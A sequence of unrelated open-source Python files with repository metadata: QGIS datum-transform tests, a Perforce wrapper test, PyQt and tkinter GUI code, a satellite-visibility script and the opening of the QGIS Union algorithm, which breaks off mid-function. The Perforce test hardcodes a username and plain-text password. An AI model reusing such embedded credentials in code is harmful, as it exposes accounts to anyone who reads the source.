self.assertEqual(ops[op1_index].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=push +v_3 +step +proj=cart +ellps=GRS80 +step +proj=helmert +x=0.06155 +y=-0.01087 +z=-0.04019 +rx=-0.0394924 +ry=-0.0327221 +rz=-0.0328979 +s=-0.009994 +convention=coordinate_frame +step +inv +proj=cart +ellps=GRS80 +step +proj=pop +v_3 +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
self.assertTrue(ops[op1_index].isAvailable)
self.assertEqual(ops[op1_index].accuracy, 0.01)
self.assertEqual(len(ops[op1_index].grids), 0)
if QgsProjUtils.projVersionMajor() == 6:
op2_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_and_distortion.gsb +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][0]
else:
op2_index = [i for i in range(len(ops))
if ops[i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_and_distortion.tif +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][0]
self.assertTrue(ops[op2_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op2_index].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=GDA94_GDA2020_conformal_and_distortion.gsb +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
else:
self.assertEqual(ops[op2_index].proj,
'+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal_and_distortion.tif +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
self.assertEqual(ops[op2_index].accuracy, 0.05)
self.assertEqual(len(ops[op2_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op2_index].grids[0].shortName, 'GDA94_GDA2020_conformal_and_distortion.gsb')
else:
self.assertEqual(ops[op2_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal_and_distortion.tif')
self.assertEqual(ops[op2_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op2_index].grids[0].packageName)
self.assertIn('http', ops[op2_index].grids[0].url)
self.assertTrue(ops[op2_index].grids[0].directDownload)
self.assertTrue(ops[op2_index].grids[0].openLicense)
if QgsProjUtils.projVersionMajor() == 6:
op3_index = [i for i in range(len(ops)) if ops[i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=GDA94_GDA2020_conformal.gsb +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][0]
else:
op3_index = [i for i in range(len(ops))
if ops[i].proj == '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal.tif +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80'][0]
self.assertTrue(ops[op3_index].name)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op3_index].proj, '+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=GDA94_GDA2020_conformal.gsb +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
else:
self.assertEqual(ops[op3_index].proj,
'+proj=pipeline +step +inv +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80 +step +proj=hgridshift +grids=au_icsm_GDA94_GDA2020_conformal.tif +step +proj=lcc +lat_0=-37 +lon_0=145 +lat_1=-36 +lat_2=-38 +x_0=2500000 +y_0=2500000 +ellps=GRS80')
self.assertEqual(ops[op3_index].accuracy, 0.05)
self.assertEqual(len(ops[op3_index].grids), 1)
if QgsProjUtils.projVersionMajor() == 6:
self.assertEqual(ops[op3_index].grids[0].shortName, 'GDA94_GDA2020_conformal.gsb')
else:
self.assertEqual(ops[op3_index].grids[0].shortName, 'au_icsm_GDA94_GDA2020_conformal.tif')
self.assertEqual(ops[op3_index].grids[0].fullName, '')
if QgsProjUtils.projVersionMajor() == 6:
self.assertTrue(ops[op3_index].grids[0].packageName)
self.assertIn('http', ops[op3_index].grids[0].url)
self.assertTrue(ops[op3_index].grids[0].directDownload)
self.assertTrue(ops[op3_index].grids[0].openLicense)
@unittest.skipIf(QgsProjUtils.projVersionMajor() < 6, 'Not a proj6 build')
def testNoLasLos(self):
"""
Test that operations which rely on an las/los grid shift file (which are unsupported by Proj6) are not returned
"""
ops = QgsDatumTransform.operations(QgsCoordinateReferenceSystem('EPSG:3035'),
QgsCoordinateReferenceSystem('EPSG:5514'))
self.assertEqual(len(ops), 3)
self.assertTrue(ops[0].name)
self.assertTrue(ops[0].proj)
self.assertTrue(ops[1].name)
self.assertTrue(ops[1].proj)
self.assertTrue(ops[2].name)
self.assertTrue(ops[2].proj)
if __name__ == '__main__':
unittest.main()
|
telwertowski/QGIS
|
tests/src/python/test_qgsdatumtransforms.py
|
Python
|
gpl-2.0
| 18,982
|
#! /usr/bin/python
'''
Created on Sep 20, 2014
@author: Grzegorz Pasieka (grz.pasieka@gmail.com)
Copyright (C) 2014 Grzegorz Pasieka
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
'''
import sys
import os
sys.path.append(os.path.abspath(os.getcwd()+"/.."))
from config_wrapper import get_branch_credentials
from p4_wrapper import p4_wrapper
#globals
p4port = "localhost:1818"
p4user = "g.pasieka"
p4client = "test_depot_g.pasieka"
p4passwd = "zaq12WSX"
def main(argv):
global p4port
global p4user
global p4client
global p4passwd
#change working dir to separate test_proj
test_dir = os.path.abspath("../../test_proj")
os.chdir(test_dir)
#(p4port, p4user, p4client) = get_branch_credentials("test-branch")
#TODO: add creating p4 repo for test
res = test_logging()
print "test_logging: "+str(res)
if not res:
return
res = test_client_read_write()
print "test_client_read_write: "+str(res)
res = test_changelists()
print "test_changelists: "+str(res)
res = test_files()
print "test_files: "+str(res)
res = test_sync()
print "test_sync: "+str(res)
def test_logging():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if res:
res = p4w.p4_logout()
return res
def test_client_read_write():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if not res:
return res
(res, p4conf) = p4w.p4_client_read()
if not res or p4conf is None:
print "ERROR: p4_client_read failed"
p4w.p4_logout()
return False
old_descr = p4conf._description
p4conf._description = "New descr"
p4w.p4_client_write(p4conf)
(res, p4conf) = p4w.p4_client_read()
if p4conf._description != "New descr\n":
print "ERROR: Description has not changed (1st)"
res = p4w.p4_logout()
return False
p4conf._description = old_descr
p4w.p4_client_write(p4conf)
(res, p4conf) = p4w.p4_client_read()
if p4conf._description != old_descr:
print "ERROR: Description has not changed (2st)"
res = p4w.p4_logout()
return False
res = p4w.p4_logout()
return res
def test_changelists():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if not res:
return False
(res, changes_all) = p4w.p4_changelists()
if len(changes_all) == 0:
print "ERROR: Getting all changelists failed"
return False
#TODO: add more tests for various cases
res = p4w.p4_logout()
return res
def test_files():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if not res:
return False
(res, files_all) = p4w.p4_files()
if len(files_all) == 0:
print "ERROR: Getting all files failed"
return False
(res, files_ch1) = p4w.p4_files(None, None, "1")
if len(files_ch1) != 1:
print "ERROR: Getting files from changelist no 1 failed"
return False
(res, files_ch2) = p4w.p4_files(None, "1", "2")
if len(files_ch2) != 2:
print "ERROR: Getting files from changelists no 1-2 failed"
return False
(res, files_ch3) = p4w.p4_files(None, "2", None)
if len(files_ch3) != 3:
print "ERROR: Getting files from changelists no 2-now failed"
return False
res = p4w.p4_logout()
return res
def test_sync():
p4w = p4_wrapper()
res = p4w.p4_login(p4port, p4user, p4client, p4passwd)
if not res:
return False
(res, file_list) = p4w.p4_sync(None, '1', True, True, 0)
(res, file_list) = p4w.p4_sync(None, '2', True, True, 0)
(res, file_list) = p4w.p4_sync(None, 2, True, True, 0)
(res, file_list) = p4w.p4_sync(None, '#head', True, True, 0)
return res
if __name__ == "__main__":
main(sys.argv)
|
GregObake/git-p4-hybrid
|
test/test_p4_wrapper.py
|
Python
|
gpl-2.0
| 4,622
|
# Distributed under the MIT license.
# Copyright (c) 2013 Dave McCoy (dave.mccoy@cospandesign.com)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
#of the Software, and to permit persons to whom the Software is furnished to do
#so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
'''
Log
7/21/2013: Initial commit
'''
import os
import sys
import json
import inspect
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from visual_graph.box import Box
from build_status import BuildStatus
class BuildBox(Box):
def __init__(self,
scene,
position,
name,
ID,
color,
parameter,
rect):
super(BuildBox, self).__init__(position = position,
scene = scene,
name = name,
color = color,
rect = rect,
user_data = parameter)
self.movable(False)
self.label_rect = QRectF(self.rect)
self.label_rect.setWidth(self.rect.width() * 0.75)
self.status_rect = QRectF(self.rect)
self.status_rect.setTopLeft(self.label_rect.topRight())
self.status_rect.setWidth(self.rect.width() * 0.25)
self.status_box = BuildStatus(scene, self.label_rect.topRight(), self.status_rect, self)
self.build_cb = None
self.ID = ID
self.setToolTip(parameter)
def contextMenuEvent(self, event):
menu_items = (("&Help", self.build_help),)
menu = QMenu(self.parentWidget())
for text, func in menu_items:
menu.addAction(text, func)
menu.exec_(event.screenPos())
def set_build_callback(self, build_cb):
self.build_cb = build_cb
def build_help(self):
print "Help"
def get_status(self):
return self.status_box.get_status()
def set_status(self, status):
self.status_box.set_status(status)
def status_update(self):
#print "animation update"
self.scene().invalidate(self.mapToScene(self.rect).boundingRect())
def mouseDoubleClickEvent(self, event):
print "Mouse double click event"
if self.build_cb is not None:
self.build_cb(self.ID)
#Paint
def paint(self, painter, option, widget):
highlight_width = 8
pen = QPen(self.style)
pen.setColor(Qt.black)
pen.setWidth(1)
if option.state & QStyle.State_Selected:
#Selected
pen.setColor(QColor("black"))
pen.setWidth(highlight_width)
painter.setPen(pen)
painter.drawRect(self.rect)
rect = self.label_rect
painter.drawRect(rect)
painter.fillRect(rect, QColor(self.color))
painter.setFont(self.text_font)
#draw text
pen.setColor(Qt.black)
painter.setPen(pen)
self.add_label_to_rect(painter, rect, self.box_name)
self.status_box.paint(painter, option, widget)
#Draw Status
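# A minimal, hypothetical wiring example (assumes a running QApplication and
# an existing QGraphicsScene; the argument values are illustrative, not from
# this module):
#
#   scene = QGraphicsScene()
#   bb = BuildBox(scene, QPointF(0, 0), "image", 0, "#c0c0ff",
#                 "builds the FPGA image", QRectF(0, 0, 120, 40))
#   bb.set_build_callback(lambda ID: sys.stdout.write("build %d\n" % ID))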
|
CospanDesign/nysa-gui
|
NysaGui/ibuilder/view/builder/build_box.py
|
Python
|
gpl-2.0
| 3,979
|
from fcntl import flock, LOCK_EX, LOCK_UN
from tempfile import TemporaryFile
class TempfileLock:
def __init__(self):
self.handle = TemporaryFile()
def lock(self):
flock(self.handle, LOCK_EX)
def unlock(self):
flock(self.handle, LOCK_UN)
def __del__(self):
self.handle.close()
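# A short usage sketch. Note the lock is advisory and only excludes callers
# sharing the same TempfileLock instance, since each instance flocks its own
# freshly created temporary file:
#
#   lock = TempfileLock()
#   lock.lock()
#   try:
#       pass  # critical section
#   finally:
#       lock.unlock()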
|
andbof/plantdb
|
plant/tempfilelock.py
|
Python
|
gpl-2.0
| 331
|
#!/usr/bin/python
import math
import time
import ephem
import os
from datetime import datetime
from process import makestuff
def get_them(name,cnt):
count = 0
for gps in visiblesats:
if name in gps.name:
plist.append(gps)
count += 1
if count==cnt:
break
satelit = []
visiblesats = []
plist = []
min_alt = 10. * math.pi / 180.
# This is Lisbon, Portugal
home = ephem.Observer()
home.lon = '-9.9' # +E
home.lat = '34.44' # +N
home.elevation = 10 # meters
satt = makestuff()
sats = satt.split('*')
for tle in sats:
sat = tle.split('|')
if sat[0] != '':
satelit.append(ephem.readtle(sat[0],sat[1],sat[2]))
for sat in satelit:
home.date = datetime.utcnow()
sat.compute(home)
if sat.alt > min_alt:  # 10 degrees above the horizon
#print sat.name, " is visible ", sat.range , " ", sat.alt
visiblesats.append(sat)
# filter how many we want
get_them('GPS',1)
get_them('COS',1)
get_them('IRI',2)
get_them('HIS',1)
for sat in plist:
for tle in sats:
sat1 = tle.split('|')
if sat1[0] == sat.name:
print sat1[0]
print sat1[1]
print sat1[2]
|
luisfcorreia/pas
|
showlist.py
|
Python
|
gpl-2.0
| 1,070
|
#! /usr/bin/env python3.3
#Search interface that gives Flickr and Youtube Results
#make the root window
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from ast import literal_eval
from subprocess import check_output
from os import chdir, getcwd
home = getcwd()
root = Tk()
#finds a directory
# dirname = filedialog.askdirectory()
#state variables
query = StringVar()
# Results will change, but must be stated as an empty string.
yt_results= StringVar()
fl_results= StringVar()
list_yt_results = StringVar()
list_fl_results = StringVar()
list_results = StringVar()
searchmsg = StringVar()
num_yt_results = IntVar()
num_fl_results = IntVar()
num_results = IntVar()
# list_selection = StringVar()
yt_list_selection = StringVar()
fl_list_selection = StringVar()
list_selection = StringVar()
selectiones = StringVar()
maxResult = IntVar()
colored_rows = StringVar()
maxResult.set(10)
colors = {'Youtube': '#f0f0ff', 'Flickr': '#ffccff'}
titles = ['Youtube', 'Flickr']
#Define in-action functions; in this case, define the search function that will
#open a new terminal and run the youtube search function I've already made in
#python 2.7 that doesn't import well into python 3.
# def download(*args):
def Search(*args):
from os import chdir
from subprocess import check_output
l_results = []
# try:
if ch_box_yt.state()[0] == 'selected':
q = query.get()
# chdir('/Users/socialmedia/Desktop/GUI/youtubeAnalytics-cmd-line-sample/')
maxRes = maxResult.get()
search = check_output(['/usr/bin/python2.7','ytSearch.py', q, str(maxRes)])
res = search.decode("utf-8")
yt_results.set(res)
make_list_yt_results()
searchmsg.set("Showing results for " + q)
for i in range(0, num_yt_results.get(), 2):
yt_lbox.itemconfigure(i, background=colors['Youtube'])
if ch_box_yt.state()[0] == 'deselected':
yt_results.set('')
make_list_yt_results()
if ch_box_fl.state()[0]== 'selected':
from subprocess import check_output
# from os import chdir
q = query.get()
# chdir('/Users/socialmedia/Desktop/GUI/')
maxRes = maxResult.get()
search = check_output(['/usr/bin/python2.7','Flickr Search.py', q, str(maxRes)])
res = search.decode("utf-8")
fl_results.set(res)
make_list_fl_results()
# searchmsg.set("Showing results for " + q)
for i in range(0, num_fl_results.get() ,2):
fl_lbox.itemconfigure(i, background=colors['Flickr'])
res = literal_eval(res)
if ch_box_fl.state()[0] == 'deselected':
fl_results.set('')
make_list_fl_results()
# for line in literal_eval(res):
# l_results += [line]
# list_results = tuple(l_results)
# except:
# pass
def make_list_yt_results(*args):
r = literal_eval(yt_results.get())
num_yt_results.set(len(r))
l = []
for n in range(len(r)):
l+=["%02d" % (n+1)+'.\t'+r[n]['title']]
l =tuple(l)
list_yt_results.set(l)
def make_list_fl_results(*args):
r = literal_eval(fl_results.get())
num_fl_results.set(len(r))
l = []
# for line in r:
# l+=[line['title']]
for n in range(len(r)):
l+=["%02d" % (n+1)+'.\t'+r[n]['title']]
l =tuple(l)
list_fl_results.set(l)
def addSelection(*args):
try:
yt_old = literal_eval(yt_list_selection.get())
except:
yt_old = []
try:
fl_old = literal_eval(fl_list_selection.get())
except:
fl_old = []
try:
fl_new = fl_lbox.curselection()
except:
fl_new = []
try:
yt_new = yt_lbox.curselection()
except:
yt_new = []
yt_selection = set(yt_old) | set(yt_new)
fl_selection = set(fl_old) | set(fl_new)
yt_list_selection.set(sorted(tuple(yt_selection), key=float))
fl_list_selection.set(sorted(tuple(fl_selection), key=float))
showSelection()
def removeSelection(*args):
try:
yt_old = list(literal_eval(yt_list_selection.get()))
except:
yt_old = []
try:
fl_old = list(literal_eval(fl_list_selection.get()))
except:
fl_old = []
ys = len(yt_old)
fs = len(fl_old)
remove = selection_list.curselection()
# print(remove)
yt_indeces = []
fl_indeces = []
for r in remove:
if int(r) == 0 or int(r) == ys+1:
# rows 0 and ys+1 are the 'Youtube'/'Flickr' header rows, not entries
pass
if int(r) < ys+1:
yt_indeces += [int(r) - 1]
if int(r) > ys+1:
fl_indeces += [int(r) - (ys+2)]
yt_r = []
fl_r = []
for i in yt_indeces:
yt_r += [yt_old[i]]
for i in fl_indeces:
fl_r += [fl_old[i]]
yt_new = set(yt_old) - set(yt_r)
fl_new = set(fl_old) - set(fl_r)
yt_list_selection.set(sorted(tuple(yt_new), key=float))
fl_list_selection.set(sorted(tuple(fl_new), key=float))
showSelection()
def showSelection(*args):
try:
yt_index = list(literal_eval(yt_list_selection.get()))
except:
yt_index = []
try:
fl_index = list(literal_eval(fl_list_selection.get()))
except:
fl_index = []
indeces = [{'index':yt_index, 'title': 'Youtube', 'select': [], 'res': literal_eval(list_yt_results.get())},
{'index':fl_index, 'title': "Flickr", 'select':fl_index, 'res': literal_eval(list_fl_results.get())}]
selections = ()
colored_rows = {}
for i in indeces:
select = ()
for d in i['index']:
select += tuple([i['res'][int(d)]])
select = tuple([i['title']])+tuple(select)
colored_rows[len(selections)]= i['title']
selections += select
selectiones.set(selections)
for r in range(len(selections)):
if r in colored_rows.keys():
selection_list.itemconfigure(r, background=colors[colored_rows[r]])
else:
selection_list.itemconfigure(r, background='')
def clearSelection(*args):
yt_list_selection.set(())
fl_list_selection.set(())
showSelection()
def saveAs(*args):
yt_selection = literal_eval(yt_list_selection.get())
fl_selection = literal_eval(fl_list_selection.get())
dirname = filedialog.askdirectory()
chdir(dirname)
try:
yt_res = literal_eval(yt_results.get())
except:
pass
try:
fl_res = literal_eval(fl_results.get())
except:
pass
for y in yt_selection:
try:
id = yt_res[int(y)]['description']['videoId']
downloadYt(id)
except:
pass
fl_ids = []
for f in fl_selection:
id = fl_res[int(f)]['id']
fl_ids += [id]
downloadFl(fl_ids, dirname)
chdir(home)
# for f in fl_selection:
# id =
def downloadYt(id):
url = 'https://www.youtube.com/watch?v='+str(id)
try:
search = check_output(['youtube-dl', url, '-f', '137+140'])
except:
try:
search = check_output(['youtube-dl', url])
except:
pass
def downloadFl(ids, dirname):
urls = []
for id in ids:
url = check_output(['/usr/bin/python2.7', home+'/Flickr_get_Original.py', id])
url = url[:-1]
url = url.decode('utf-8')
urls += ['-O', url]
search = ['/usr/bin/curl']+urls
chdir(dirname)
check_output(search)
def preview(*args):
#try all listbox variables for non-empty values; if selection is a list, preview only the first of them
try:
yt_curse = yt_lbox.curselection()
yt_res = literal_eval(yt_results.get())
id = yt_res[int(yt_curse[0])]['description']['videoId']
previewYT(id)
except:
pass
try:
fl_curse = fl_lbox.curselection()
fl_res = literal_eval(fl_results.get())
id = fl_res[int(fl_curse[0])]['id']
# print(id)
url = check_output(['/usr/bin/python2.7',home+'/Flickr_get_medium.py', id])
previewFL(url)
except:
raise
# try:
# ser_curse = ser_lbox.curselection()
def previewYT(id):
url = 'https://www.youtube.com/watch?v='+str(id)
search = check_output(['/usr/bin/open', url, '-a', 'vlc'])
def previewFL(url):
search = check_output(['/usr/bin/open','-g', url, '-a', 'vlc'])
# def preview(*args):
# Create and grid the outer content frame
c = ttk.Frame(root, padding=(10,10,12,0))
c.grid(column=0, row=0, sticky=(N,W,S,E))
root.grid_columnconfigure(0, weight=1)
root.grid_rowconfigure(0,weight=1)
#Create all widgets
query_entry = ttk.Entry(c, textvariable=query, width=50)
yt_lbox = Listbox(c, listvariable=list_yt_results, height=11, selectmode='extended')
fl_lbox = Listbox(c, listvariable=list_fl_results, height=11, selectmode='extended')
yt_lbl = ttk.Label(c, text="Youtube Search Results:", justify='left')
fl_lbl = ttk.Label(c, text="Flickr Search Results:", justify='left')
search = ttk.Button(c, text='Search', command=Search, default='active')
status = ttk.Label(c, textvariable=searchmsg, justify='right')
max_results = Spinbox(c, from_=10, to=50, textvariable=maxResult, width = 5)
# Make a sub-frame for the options and results
options = ttk.Frame(c, padding=0)
# ch_box_yt = ttk.Checkbutton(options, text='Youtube', instate='selected');
# ch_box_fl = ttk.Checkbutton(options, text='Flickr', instate='selected');
ch_box_yt = ttk.Checkbutton(options, text='Youtube');
ch_box_fl = ttk.Checkbutton(options, text='Flickr');
ch_box_local = ttk.Checkbutton(options, text='Local Server (Not Available yet)', state='disabled');
selection_list = Listbox(options, listvariable = selectiones, height=10, selectmode='extended')
clear = ttk.Button(options, text= 'clear', command=clearSelection)
save_as = ttk.Button(options, text= 'save as', command =saveAs, state='active')
ch_box_yt.grid(sticky=W, columnspan=2)
ch_box_fl.grid(sticky=W, columnspan=2)
ch_box_local.grid(sticky=W, columnspan=2)
selection_list.grid(sticky=(S, N, W, E), columnspan=2)
clear.grid(column=0, sticky=(W,E))
save_as.grid(column=1, row=4, sticky=(W,E))
options.grid_rowconfigure(3, weight=1)
options.grid_columnconfigure(1, weight=1)
# make add and remove buttons in a frame
addRemove = ttk.Frame(c, padding=0)
addSelect = ttk.Button(addRemove, text= '>>', command=addSelection)#, width=2)
removeSelect = ttk.Button(addRemove, text= '<<', command=removeSelection)#, width=2)
# moreResults = ttk.Button(addRemove, text= 'more\nresults', command=removeSelection, width=2)
prevSelect = ttk.Button(addRemove, text = 'view', command = preview);
addRemove.grid(column=3, row=2, rowspan = 3)
addSelect.grid()
removeSelect.grid()
prevSelect.grid()
# Grid all the widgets
query_entry.grid(column=0, row=0, sticky=(W,E))
yt_lbl.grid(column=0, row= 1, columnspan=2, sticky=(W,E))
fl_lbl.grid(column=0, row= 3, columnspan=2, sticky=(W,E))
yt_lbox.grid(column=0, row=2, columnspan=2, sticky=(N,S,W,E))
fl_lbox.grid(column=0, row=4, columnspan=2, sticky=(N,S,W,E))
options.grid(column=4, row=0, rowspan=5, sticky=(W,N,S,E))
search.grid(column=1, row=0, columnspan=2, sticky=(W,E))
status.grid(column=0, row=5, columnspan=3, sticky=(S,W,E))
max_results.grid(column=1, row=5, sticky=(S,W,E))
c.grid_columnconfigure(0, weight=5)
c.grid_columnconfigure(4, weight=4)
c.grid_rowconfigure(2, weight=1)
c.grid_rowconfigure(4, weight=1)
yt_s = ttk.Scrollbar(c, orient=VERTICAL, command=yt_lbox.yview)
yt_lbox.configure(yscrollcommand=yt_s.set)
yt_s.grid(column = 2, row = 2, sticky=(W,N,S))
fl_s = ttk.Scrollbar(c, orient=VERTICAL, command=fl_lbox.yview)
fl_lbox.configure(yscrollcommand=fl_s.set)
fl_s.grid(column = 2, row = 4, sticky=(W,N,S))
root.bind('<Return>', Search)
yt_lbox.bind('<space>', preview)
fl_lbox.bind('<space>', preview)
ttk.Sizegrip().grid(column=3, row=6, sticky=(S,E))
query.set('')
yt_results.set('')
fl_results.set('')
num_yt_results.set(10)
num_fl_results.set(10)
yt_lbox.selection_set(0)
fl_lbox.selection_set(0)
root.mainloop()
|
jpcurrea/FIU-Developmental-Psychobiology-Lab
|
search.py
|
Python
|
gpl-2.0
| 11,013
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
Union.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import QIcon
from qgis.core import QGis, QgsFeatureRequest, QgsFeature, QgsGeometry, QgsWKBTypes
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.ProcessingLog import ProcessingLog
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.core.parameters import ParameterVector
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
wkbTypeGroups = {
'Point': (QGis.WKBPoint, QGis.WKBMultiPoint, QGis.WKBPoint25D, QGis.WKBMultiPoint25D,),
'LineString': (QGis.WKBLineString, QGis.WKBMultiLineString, QGis.WKBLineString25D, QGis.WKBMultiLineString25D,),
'Polygon': (QGis.WKBPolygon, QGis.WKBMultiPolygon, QGis.WKBPolygon25D, QGis.WKBMultiPolygon25D,),
}
for key, value in wkbTypeGroups.items():
for const in value:
wkbTypeGroups[const] = key
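# After this loop wkbTypeGroups maps in both directions: group names to
# tuples of WKB constants, and each WKB constant back to its group name,
# e.g. wkbTypeGroups[QGis.WKBPoint] == 'Point'.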
GEOM_25D = [QGis.WKBPoint25D, QGis.WKBLineString25D, QGis.WKBPolygon25D,
QGis.WKBMultiPoint25D, QGis.WKBMultiLineString25D,
QGis.WKBMultiPolygon25D]
class Union(GeoAlgorithm):
INPUT = 'INPUT'
INPUT2 = 'INPUT2'
OUTPUT = 'OUTPUT'
def getIcon(self):
return QIcon(os.path.join(pluginPath, 'images', 'ftools', 'union.png'))
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Union')
self.group, self.i18n_group = self.trAlgorithm('Vector overlay tools')
self.addParameter(ParameterVector(Union.INPUT,
self.tr('Input layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addParameter(ParameterVector(Union.INPUT2,
self.tr('Input layer 2'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addOutput(OutputVector(Union.OUTPUT, self.tr('Union')))
def processAlgorithm(self, progress):
vlayerA = dataobjects.getObjectFromUri(self.getParameterValue(Union.INPUT))
vlayerB = dataobjects.getObjectFromUri(self.getParameterValue(Union.INPUT2))
vproviderA = vlayerA.dataProvider()
geomType = vproviderA.geometryType()
if geomType in GEOM_25D:
raise GeoAlgorithmExecutionException(
self.tr('Input layer has unsupported geometry type {}').format(geomType))
fields = vector.combineVectorFields(vlayerA, vlayerB)
writer = self.getOutputFromName(Union.OUTPUT).getVectorWriter(fields,
geomType, vproviderA.crs())
inFeatA = QgsFeature()
inFeatB = QgsFeature()
outFeat = QgsFeature()
indexA = vector.spatialindex(vlayerB)
indexB = vector.spatialindex(vlayerA)
count = 0
nElement = 0
featuresA = vector.features(vlayerA)
nFeat = len(featuresA)
for inFeatA in featuresA:
progress.setPercentage(nElement / float(nFeat) * 50)
nElement += 1
lstIntersectingB = []
geom = QgsGeometry(inFeatA.geometry())
atMapA = inFeatA.attributes()
intersects = indexA.intersects(geom.boundingBox())
if len(intersects) < 1:
try:
outFeat.setGeometry(geom)
outFeat.setAttributes(atMapA)
writer.addFeature(outFeat)
except:
# This really shouldn't happen, as we haven't
# edited the input geom at all
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
else:
for id in intersects:
count += 1
request = QgsFeatureRequest().setFilterFid(id)
